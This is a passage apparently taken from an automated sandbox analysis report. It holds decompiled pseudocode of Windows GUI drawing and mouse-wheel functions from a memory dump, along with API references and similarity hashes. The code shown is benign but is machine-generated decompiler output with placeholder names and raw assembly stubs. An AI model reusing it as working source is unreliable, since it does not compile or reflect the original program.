					E004207E0( *(_v8 + 4), _t159, _t179[1],  *_t179, _t179, _t181, 0, 0, _v28,  *(_t181 + 0x20),  *(_t181 + 0x1c), 0, 0,  *(E004246E8(_t159) + 4), _t179[3] - _t179[1], _t179[2] -  *_t179);
					_t131 = 0;
					_t175 = 0;
					 *[fs:eax] = _t175;
					_push(0x42462f);
					if(_v32 != 0) {
						_t131 = SelectObject(_v28, _v32);
					}
					if(_v28 != 0) {
						return DeleteDC(_v28);
					}
					return _t131;
				}
			}

0x00424418
0x00424419
0x0042441b
0x00424421
0x00424423
0x00424426
0x00424428
0x0042442b
0x00424434
0x0042443b
0x00424442
0x00424445
0x00424449
0x0042444e
0x00424450
0x00424452
0x00424456
0x00424459
0x0042445a
0x0042445f
0x00424468
0x00424469
0x0042446e
0x0042446e
0x00424472
0x00424477
0x0042447a
0x0042447b
0x00424480
0x00424481
0x00424486
0x0042448a
0x0042448f
0x00424493
0x00424498
0x004244a9
0x004244a9
0x0042449a
0x0042449e
0x004244a7
0x004244ad
0x00000000
0x00000000
0x00000000
0x004244a7
0x004244b1
0x004244f4
0x00424501
0x00424501
0x004244b3
0x004244be
0x004244cc
0x004244e4
0x004244e4
0x00424508
0x00424509
0x0042450e
0x00424511
0x0042451d
0x00424521
0x00424521
0x00424528
0x0042452d
0x00424533
0x00424541
0x0042462a
0x00424631
0x00424634
0x00424637
0x00424640
0x00424642
0x00424647
0x0042464b
0x0042464e
0x0042464f
0x00000000
0x0042464f
0x00424654
0x00424547
0x00424549
0x0042454e
0x00424553
0x00424554
0x00424559
0x0042455c
0x00424561
0x0042456b
0x0042457b
0x004245b5
0x004245ba
0x004245bc
0x004245bf
0x004245c2
0x004245cb
0x004245d5
0x004245d5
0x004245de
0x00000000
0x004245e4
0x004245e9
0x004245e9

APIs

Part of subcall function 00424A88: 7378AC50.USER32(00000000,?,?,?,?,004235DF,00000000,0042366B), ref: 00424ADE
Part of subcall function 00424A88: 7378AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,004235DF,00000000,0042366B), ref: 00424AF3
Part of subcall function 00424A88: 7378AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,004235DF,00000000,0042366B), ref: 00424AFD
Part of subcall function 00424A88: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,004235DF,00000000,0042366B), ref: 00424B21
Part of subcall function 00424A88: 7378B380.USER32(00000000,00000000,00000000,?,?,?,?,004235DF,00000000,0042366B), ref: 00424B2C

7378B410.GDI32(?,?,000000FF), ref: 0042445A
7378B150.GDI32(?,?,?,000000FF), ref: 00424469
7378AD70.GDI32(?,0000000C), ref: 0042447B
7378AD70.GDI32(?,0000000E,00000000,?,0000000C), ref: 0042448A
GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 004244BE
SetStretchBltMode.GDI32(?,00000004), ref: 004244CC
SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 004244E4
SetStretchBltMode.GDI32(00000000,00000003), ref: 00424501
7378A590.GDI32(00000000,00000000,004245EA,?,?,0000000E,00000000,?,0000000C), ref: 00424561
SelectObject.GDI32(?,?), ref: 00424576
SelectObject.GDI32(?,00000000), ref: 004245D5
DeleteDC.GDI32(00000000), ref: 004245E4

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: 7378$BrushModeObjectSelectStretch$A590B150B380B410CreateDeleteHalftonePalette
String ID:
API String ID: 3450332414-0
Opcode ID: 97c365144a95f33ef9c55f08ccb8b8949dde4d6c474002a7c25ea683272f980f
Instruction ID: c7bce11894e60d325533f11e34d51ac38df9cff0d4223dca934f8cec0068b5bf
Opcode Fuzzy Hash: 97c365144a95f33ef9c55f08ccb8b8949dde4d6c474002a7c25ea683272f980f
Instruction Fuzzy Hash: 637159B5B00215AFCB40EFA9D985F5EB7F8EB49304F51846AF609E7281D638ED40CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0042064C, Relevance: 21.1, APIs: 14, Instructions: 131
windowCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E0042064C(struct HDC__* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _v8;
				int _v12;
				int _v16;
				void* _v20;
				int _v24;
				struct HDC__* _v28;
				struct HDC__* _v32;
				int _v48;
				int _v52;
				void _v56;
				int _t37;
				void* _t41;
				int _t43;
				void* _t47;
				void* _t72;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t85;
				void* _t87;
				void* _t88;
				intOrPtr _t89;

				_t87 = _t88;
				_t89 = _t88 + 0xffffffcc;
				asm("movsd");
				asm("movsd");
				_t71 = __ecx;
				_v8 = __eax;
				_push(0);
				L00406A60();
				_v28 = __eax;
				_push(0);
				L00406A60();
				_v32 = __eax;
				_push(_t87);
				_push(0x42079a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t89;
				_t37 = GetObjectA(_v8, 0x18,  &_v56);
				if(__ecx == 0) {
					_push(0);
					L00406E30();
					_v24 = _t37;
					if(_v24 == 0) {
						E00420594(__ecx);
					}
					_push(_t87);
					_push(0x420709);
					_push( *[fs:eax]);
					 *[fs:eax] = _t89;
					_push(_v12);
					_push(_v16);
					_t41 = _v24;
					_push(_t41);
					L00406A58();
					_v20 = _t41;
					if(_v20 == 0) {
						E00420594(_t71);
					}
					_pop(_t79);
					 *[fs:eax] = _t79;
					_push(0x420710);
					_t43 = _v24;
					_push(_t43);
					_push(0);
					L00407090();
					return _t43;
				} else {
					_push(0);
					_push(1);
					_push(1);
					_push(_v12);
					_t47 = _v16;
					_push(_t47);
					L00406A48();
					_v20 = _t47;
					if(_v20 != 0) {
						_t72 = SelectObject(_v28, _v8);
						_t85 = SelectObject(_v32, _v20);
						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
						if(_t72 != 0) {
							SelectObject(_v28, _t72);
						}
						if(_t85 != 0) {
							SelectObject(_v32, _t85);
						}
					}
					_pop(_t80);
					 *[fs:eax] = _t80;
					_push(E004207A1);
					DeleteDC(_v28);
					return DeleteDC(_v32);
				}
			}

0x0042064d
0x0042064f
0x0042065a
0x0042065b
0x0042065c
0x0042065e
0x00420661
0x00420663
0x00420668
0x0042066b
0x0042066d
0x00420672
0x00420677
0x00420678
0x0042067d
0x00420680
0x0042068d
0x00420694
0x004206ae
0x004206b0
0x004206b5
0x004206bc
0x004206be
0x004206be
0x004206c5
0x004206c6
0x004206cb
0x004206ce
0x004206d4
0x004206d8
0x004206d9
0x004206dc
0x004206dd
0x004206e2
0x004206e9
0x004206eb
0x004206eb
0x004206f2
0x004206f5
0x004206f8
0x004206fd
0x00420700
0x00420701
0x00420703
0x00420708
0x00420696
0x00420696
0x00420698
0x0042069a
0x0042069f
0x004206a0
0x004206a3
0x004206a4
0x004206a9
0x00420714
0x00420723
0x00420732
0x00420759
0x00420760
0x00420767
0x00420767
0x0042076e
0x00420775
0x00420775
0x0042076e
0x0042077c
0x0042077f
0x00420782
0x0042078b
0x00420799
0x00420799

APIs

7378A590.GDI32(00000000), ref: 00420663
7378A590.GDI32(00000000,00000000), ref: 0042066D
GetObjectA.GDI32(?,00000018,?), ref: 0042068D
7378A410.GDI32(?,?,00000001,00000001,00000000,?,00000018,?,00000000,0042079A,?,00000000,00000000), ref: 004206A4
7378AC50.USER32(00000000,?,00000018,?,00000000,0042079A,?,00000000,00000000), ref: 004206B0
7378A520.GDI32(00000000,?,?,00000000,00420709,?,00000000,?,00000018,?,00000000,0042079A,?,00000000,00000000), ref: 004206DD
7378B380.USER32(00000000,00000000,00420710,00000000,00420709,?,00000000,?,00000018,?,00000000,0042079A,?,00000000,00000000), ref: 00420703
SelectObject.GDI32(?,?), ref: 0042071E
SelectObject.GDI32(?,00000000), ref: 0042072D
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 00420759
SelectObject.GDI32(?,00000000), ref: 00420767
SelectObject.GDI32(?,00000000), ref: 00420775
DeleteDC.GDI32(?), ref: 0042078B
DeleteDC.GDI32(?), ref: 00420794

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: 7378$Object$Select$A590Delete$A410A520B380Stretch
String ID:
API String ID: 1734081924-0
Opcode ID: 7a44f8c3aaf290c244923087a83e32b26611e6e1a7b93cae949dbf95e8e0c829
Instruction ID: d26a8547e5d6fdc07dcb9ddd540314c92d298950bde6cc003a7bc4477a197fa3
Opcode Fuzzy Hash: 7a44f8c3aaf290c244923087a83e32b26611e6e1a7b93cae949dbf95e8e0c829
Instruction Fuzzy Hash: A3412D71B00219AFDB00EBE9DC52FAFB7FCEB49704F514426B605F7281D67869108BA8

Uniqueness

Uniqueness Score: -1.00%

Function 004401C8, Relevance: 19.7, APIs: 13, Instructions: 213
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E004401C8(intOrPtr* __eax, intOrPtr __edx) {
				intOrPtr* _v8;
				intOrPtr _v12;
				struct HDC__* _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* _v64;
				struct HDC__* _t115;
				void* _t166;
				intOrPtr* _t188;
				intOrPtr* _t191;
				void* _t200;
				intOrPtr _t207;
				signed int _t224;
				void* _t227;
				void* _t229;
				intOrPtr _t230;

				_t227 = _t229;
				_t230 = _t229 + 0xffffffc4;
				_v12 = __edx;
				_v8 = __eax;
				if( *(_v8 + 0x165) != 0 ||  *(_v8 + 0x16c) > 0) {
					_t115 = E0043F370(_v8);
					_push(_t115);
					L00406F30();
					_v16 = _t115;
					_push(_t227);
					_push(0x44042e);
					_push( *[fs:edx]);
					 *[fs:edx] = _t230;
					GetClientRect(E0043F370(_v8),  &_v32);
					GetWindowRect(E0043F370(_v8),  &_v48);
					MapWindowPoints(0, E0043F370(_v8),  &_v48, 2);
					OffsetRect( &_v32,  ~(_v48.left),  ~(_v48.top));
					ExcludeClipRect(_v16, _v32, _v32.top, _v32.right, _v32.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					InflateRect( &_v32,  *(_v8 + 0x16c),  *(_v8 + 0x16c));
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					if( *(_v8 + 0x165) != 0) {
						_t200 = 0;
						if( *(_v8 + 0x163) != 0) {
							_t200 = 0 +  *((intOrPtr*)(_v8 + 0x168));
						}
						if( *(_v8 + 0x164) != 0) {
							_t200 = _t200 +  *((intOrPtr*)(_v8 + 0x168));
						}
						_t224 = GetWindowLongA(E0043F370(_v8), 0xfffffff0);
						if(( *(_v8 + 0x162) & 0x00000001) != 0) {
							_v48.left = _v48.left - _t200;
						}
						if(( *(_v8 + 0x162) & 0x00000002) != 0) {
							_v48.top = _v48.top - _t200;
						}
						if(( *(_v8 + 0x162) & 0x00000004) != 0) {
							_v48.right = _v48.right + _t200;
						}
						if((_t224 & 0x00200000) != 0) {
							_t191 =  *0x48e5b4; // 0x48fa94
							_v48.right = _v48.right +  *((intOrPtr*)( *_t191))(0x14);
						}
						if(( *(_v8 + 0x162) & 0x00000008) != 0) {
							_v48.bottom = _v48.bottom + _t200;
						}
						if((_t224 & 0x00100000) != 0) {
							_t188 =  *0x48e5b4; // 0x48fa94
							_v48.bottom = _v48.bottom +  *((intOrPtr*)( *_t188))(0x15);
						}
						DrawEdge(_v16,  &_v48,  *(0x47199c + ( *(_v8 + 0x163) & 0x000000ff) * 4) |  *(0x4719ac + ( *(_v8 + 0x164) & 0x000000ff) * 4),  *(_v8 + 0x162) & 0x000000ff |  *(0x4719bc + ( *(_v8 + 0x165) & 0x000000ff) * 4) |  *(0x4719cc + ( *(_v8 + 0x1a5) & 0x000000ff) * 4) | 0x00002000);
					}
					IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					OffsetRect( &_v48,  ~_v48,  ~(_v48.top));
					FillRect(_v16,  &_v48, E0041F7EC( *((intOrPtr*)(_v8 + 0x170))));
					_pop(_t207);
					 *[fs:eax] = _t207;
					_push(0x440435);
					_push(_v16);
					_t166 = E0043F370(_v8);
					_push(_t166);
					L00407090();
					return _t166;
				} else {
					return  *((intOrPtr*)( *_v8 - 0x10))();
				}
			}

0x004401c9
0x004401cb
0x004401d1
0x004401d4
0x004401e1
0x004401f6
0x004401fb
0x004401fc
0x00440201
0x00440206
0x00440207
0x0044020c
0x0044020f
0x0044021f
0x00440231
0x00440247
0x0044025c
0x00440275
0x00440280
0x00440281
0x00440282
0x00440283
0x00440293
0x0044029e
0x0044029f
0x004402a0
0x004402a1
0x004402ac
0x004402b2
0x004402be
0x004402c3
0x004402c3
0x004402d3
0x004402d8
0x004402d8
0x004402ee
0x004402fa
0x004402fc
0x004402fc
0x00440309
0x0044030b
0x0044030b
0x00440318
0x0044031a
0x0044031a
0x00440323
0x00440327
0x00440330
0x00440330
0x0044033d
0x0044033f
0x0044033f
0x00440348
0x0044034c
0x00440355
0x00440355
0x004403b5
0x004403b5
0x004403ce
0x004403d9
0x004403da
0x004403db
0x004403dc
0x004403ed
0x00440409
0x00440410
0x00440413
0x00440416
0x0044041e
0x00440422
0x00440427
0x00440428
0x0044042d
0x00440435
0x00440446
0x00440446

APIs

7378B080.USER32(00000000), ref: 004401FC
GetClientRect.USER32 ref: 0044021F
GetWindowRect.USER32 ref: 00440231
MapWindowPoints.USER32 ref: 00440247
OffsetRect.USER32(?,?,?), ref: 0044025C
ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 00440275
InflateRect.USER32(?,00000000,00000000), ref: 00440293
GetWindowLongA.USER32 ref: 004402E9
DrawEdge.USER32(?,?,00000000,00000008), ref: 004403B5
IntersectClipRect.GDI32(?,?,?,?,?), ref: 004403CE
OffsetRect.USER32(?,?,?), ref: 004403ED
FillRect.USER32 ref: 00440409
7378B380.USER32(00000000,?,00440435,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 00440428

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$Window$7378ClipOffset$B080B380ClientDrawEdgeExcludeFillInflateIntersectLongPoints
String ID:
API String ID: 1602842641-0
Opcode ID: d239b6d83fd5890e964fa995a5fe5e022103c071927bc4894de3fd2282d1dee1
Instruction ID: 213ea895912a70a8ca5a773c33adc9970a9189f77f50976c9854d6eb8ffa4e4d
Opcode Fuzzy Hash: d239b6d83fd5890e964fa995a5fe5e022103c071927bc4894de3fd2282d1dee1
Instruction Fuzzy Hash: 5F81E371E00608AFDB41DBA9C885EEEB7F9AF09304F1440A6F914F7291C779AE55CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004072C0, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61
registryclipboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004072C0(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr* _v8;
				struct HWND__* _t19;
				int* _t20;
				int* _t26;
				int* _t27;

				_t26 = _t20;
				_t27 = __edx;
				_v8 = __eax;
				_t19 = FindWindowA("MouseZ", "Magellan MSWHEEL");
				 *_v8 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
				 *_t27 = RegisterClipboardFormatA("MSH_WHEELSUPPORT_MSG");
				 *_t26 = RegisterClipboardFormatA("MSH_SCROLL_LINES_MSG");
				if( *_t27 == 0 || _t19 == 0) {
					 *_a8 = 0;
				} else {
					 *_a8 = SendMessageA(_t19,  *_t27, 0, 0);
				}
				if( *_t26 == 0 || _t19 == 0) {
					 *_a4 = 3;
				} else {
					 *_a4 = SendMessageA(_t19,  *_t26, 0, 0);
				}
				return _t19;
			}

0x004072c7
0x004072c9
0x004072cb
0x004072dd
0x004072ec
0x004072f8
0x00407304
0x00407309
0x00407328
0x0040730f
0x0040731f
0x0040731f
0x0040732d
0x0040734a
0x00407333
0x00407343
0x00407343
0x00407357

APIs

FindWindowA.USER32 ref: 004072D8
RegisterClipboardFormatA.USER32(MSWHEEL_ROLLMSG), ref: 004072E4
RegisterClipboardFormatA.USER32(MSH_WHEELSUPPORT_MSG), ref: 004072F3
RegisterClipboardFormatA.USER32(MSH_SCROLL_LINES_MSG), ref: 004072FF
SendMessageA.USER32 ref: 00407317
SendMessageA.USER32 ref: 0040733B

Strings

MSWHEEL_ROLLMSG, xrefs: 004072DF
Magellan MSWHEEL, xrefs: 004072CE
MSH_SCROLL_LINES_MSG, xrefs: 004072FA
MouseZ, xrefs: 004072D3
MSH_WHEELSUPPORT_MSG, xrefs: 004072EE

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: ClipboardFormatRegister$MessageSend$FindWindow
String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
API String ID: 1416857345-3736581797
Opcode ID: fc28f8cd1474f417419845a76e164ddcecbb7c8c0b41082bd873b79f9500c3e3
Instruction ID: 413e2d452572d236b9306eea21cdd9fe0401c02e22aa528b1d9c3d858248855a
Opcode Fuzzy Hash: fc28f8cd1474f417419845a76e164ddcecbb7c8c0b41082bd873b79f9500c3e3
Instruction Fuzzy Hash: 0D111F71A48305AFF314AF55CC41B66B7A8EF44710F204136FD84AB2C1D6B9BC41D7AA

Uniqueness

Uniqueness Score: -1.00%

Function 00426F50, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00426F50(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
				struct tagPOINT _v12;
				int _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t60;
				int _t61;
				RECT* _t64;
				struct HDC__* _t65;

				_t64 = _a8;
				_t65 = _a4;
				if( *0x48fac3 != 0) {
					_t61 = 0;
					if(_a12 == 0) {
						L14:
						return _t61;
					}
					_v32.left = 0;
					_v32.top = 0;
					_v32.right = GetSystemMetrics(0);
					_v32.bottom = GetSystemMetrics(1);
					if(_t65 == 0) {
						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
							L13:
							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
						} else {
							_t61 = 1;
						}
						goto L14;
					}
					_v16 = GetClipBox(_t65,  &_v48);
					if(GetDCOrgEx(_t65,  &_v12) == 0) {
						goto L14;
					}
					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
							goto L13;
						}
						if(_v16 == 1) {
							_t61 = 1;
						}
						goto L14;
					} else {
						goto L13;
					}
				}
				 *0x48fab0 = E004269A4(7, _t60,  *0x48fab0, _t64, _t65);
				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
				goto L14;
			}

0x00426f59
0x00426f5c
0x00426f66
0x00426f96
0x00426f9c
0x00427058
0x00427060
0x00427060
0x00426fa4
0x00426fa9
0x00426fb4
0x00426fbf
0x00426fc4
0x0042702d
0x00427045
0x00427056
0x00427041
0x00427041
0x00427041
0x00000000
0x0042702d
0x00426fd0
0x00426fdf
0x00000000
0x00000000
0x00426ff1
0x00427009
0x0042701f
0x00000000
0x00000000
0x00427025
0x00427027
0x00427027
0x00000000
0x00000000
0x00000000
0x00000000
0x00427009
0x00426f7a
0x00426f8f
0x00000000

APIs

EnumDisplayMonitors.USER32(?,?,?,?), ref: 00426F89
GetSystemMetrics.USER32 ref: 00426FAE
GetSystemMetrics.USER32 ref: 00426FB9
GetClipBox.GDI32(?,?), ref: 00426FCB
GetDCOrgEx.GDI32(?,?), ref: 00426FD8
OffsetRect.USER32(?,?,?), ref: 00426FF1
IntersectRect.USER32 ref: 00427002
IntersectRect.USER32 ref: 00427018

Part of subcall function 004269A4: GetProcAddress.KERNEL32(74EA0000,00000000), ref: 00426A24

Strings

EnumDisplayMonitors, xrefs: 00426F68

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
String ID: EnumDisplayMonitors
API String ID: 362875416-2491903729
Opcode ID: 2a17fd8f221bdc6dc8a00e26504724b85d04c7ccb706610bbd9043dcf0a2c9b8
Instruction ID: ac9b69e9cf31da9c785e8c718e67a5221e2514bf759367680ce38615bb1666a6
Opcode Fuzzy Hash: 2a17fd8f221bdc6dc8a00e26504724b85d04c7ccb706610bbd9043dcf0a2c9b8
Instruction Fuzzy Hash: 64315E72B04159AFDB10DFA5D8459EF77BCAB05314F40453BFD19E3240EB3899088B69

Uniqueness

Uniqueness Score: -1.00%

Function 0043D5A0, Relevance: 16.6, APIs: 11, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0043D5A0(intOrPtr* __eax, void* __edx) {
				struct HDC__* _v8;
				void* _v12;
				void* _v16;
				struct tagPAINTSTRUCT _v80;
				intOrPtr _v84;
				void* _v96;
				struct HDC__* _v104;
				void* _v112;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t38;
				struct HDC__* _t47;
				struct HDC__* _t55;
				intOrPtr* _t83;
				intOrPtr _t102;
				void* _t103;
				void* _t108;
				void* _t111;
				void* _t113;
				intOrPtr _t114;

				_t111 = _t113;
				_t114 = _t113 + 0xffffff94;
				_push(_t103);
				_t108 = __edx;
				_t83 = __eax;
				if( *((char*)(__eax + 0x1f8)) == 0 ||  *((intOrPtr*)(__edx + 4)) != 0) {
					if(( *(_t83 + 0x55) & 0x00000001) != 0 || E0043C1F8(_t83) != 0) {
						_t38 = E0043D0C0(_t83, _t83, _t108, _t103, _t108);
					} else {
						_t38 =  *((intOrPtr*)( *_t83 - 0x10))();
					}
					return _t38;
				} else {
					L00406E30();
					 *((intOrPtr*)( *__eax + 0x44))();
					 *((intOrPtr*)( *__eax + 0x44))();
					_t47 = _v104;
					L00406A58();
					_v12 = _t47;
					L00407090();
					L00406A60();
					_v8 = _t47;
					_v16 = SelectObject(_v8, _v12);
					 *[fs:eax] = _t114;
					_t55 = BeginPaint(E0043F370(_t83),  &_v80);
					E00439EA4(_t83, _v8, 0x14, _v8);
					 *((intOrPtr*)(_t108 + 4)) = _v8;
					E0043D5A0(_t83, _t108);
					 *((intOrPtr*)(_t108 + 4)) = 0;
					 *((intOrPtr*)( *_t83 + 0x44))(_v8, 0, 0, 0xcc0020,  *[fs:eax], 0x43d6f2, _t111, 0, 0, __eax, __eax, _t47, _v84, 0);
					 *((intOrPtr*)( *_t83 + 0x44))(_v84);
					_push(_v104);
					_push(0);
					_push(0);
					L00406A38();
					EndPaint(E0043F370(_t83),  &_v80);
					_t102 = _t55;
					 *[fs:eax] = _t102;
					_push(0x43d6f9);
					SelectObject(_v8, _v16);
					DeleteDC(_v8);
					return DeleteObject(_v12);
				}
			}

0x0043d5a1
0x0043d5a3
0x0043d5a8
0x0043d5a9
0x0043d5ab
0x0043d5b4
0x0043d5c0
0x0043d5df
0x0043d5cd
0x0043d5d3
0x0043d5d3
0x0043d6ff
0x0043d5e9
0x0043d5eb
0x0043d5f9
0x0043d607
0x0043d60a
0x0043d60f
0x0043d614
0x0043d61a
0x0043d621
0x0043d626
0x0043d636
0x0043d644
0x0043d653
0x0043d668
0x0043d670
0x0043d677
0x0043d67e
0x0043d695
0x0043d6a3
0x0043d6a9
0x0043d6aa
0x0043d6ac
0x0043d6af
0x0043d6c0
0x0043d6c7
0x0043d6ca
0x0043d6cd
0x0043d6da
0x0043d6e3
0x0043d6f1
0x0043d6f1

APIs

7378AC50.USER32(00000000), ref: 0043D5EB
7378A520.GDI32(00000000,?), ref: 0043D60F
7378B380.USER32(00000000,00000000,00000000,?), ref: 0043D61A
7378A590.GDI32(00000000,00000000,00000000,00000000,?), ref: 0043D621
SelectObject.GDI32(00000000,?), ref: 0043D631
BeginPaint.USER32(00000000,?,00000000,0043D6F2,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0043D653
737997E0.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0043D6AF
EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0043D6C0
SelectObject.GDI32(00000000,?), ref: 0043D6DA
DeleteDC.GDI32(00000000), ref: 0043D6E3
DeleteObject.GDI32(?), ref: 0043D6EC

Part of subcall function 0043D0C0: BeginPaint.USER32(00000000,?), ref: 0043D0E6
Part of subcall function 0043D0C0: EndPaint.USER32(00000000,?,0043D1E7), ref: 0043D1DA

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: 7378Paint$Object$BeginDeleteSelect$737997A520A590B380
String ID:
API String ID: 2313290061-0
Opcode ID: 5a3e04c301e325c4972d0f2088609d59fa911dd45dc8f2a605fa39d648e073c2
Instruction ID: d66b789b3e3e0027213199f312dce475439fcebb8d8bdcc4f71af37a63feaf05
Opcode Fuzzy Hash: 5a3e04c301e325c4972d0f2088609d59fa911dd45dc8f2a605fa39d648e073c2
Instruction Fuzzy Hash: 94412F75B00204AFDB00EBA9CD85B9EB7F8AF4D704F10447AB50AEB281DA78ED058B54

Uniqueness

Uniqueness Score: -1.00%

Function 00436648, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 139
threadCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00436648(intOrPtr __eax, void* __ecx, char _a4) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				struct HWND__* _v24;
				intOrPtr _v28;
				char _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				struct HWND__* _t53;
				intOrPtr _t55;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t78;
				intOrPtr _t84;
				intOrPtr _t86;
				intOrPtr _t93;
				intOrPtr _t98;
				intOrPtr _t101;
				void* _t102;
				intOrPtr* _t104;
				intOrPtr _t106;
				intOrPtr _t110;
				intOrPtr _t112;
				struct HWND__* _t113;
				intOrPtr _t114;
				intOrPtr _t116;
				intOrPtr _t117;

				_t102 = __ecx;
				_t101 = __eax;
				_v5 = 1;
				_t2 =  &_a4; // 0x436969
				_t113 = E00436A80( *_t2 + 0xfffffff7);
				_v24 = _t113;
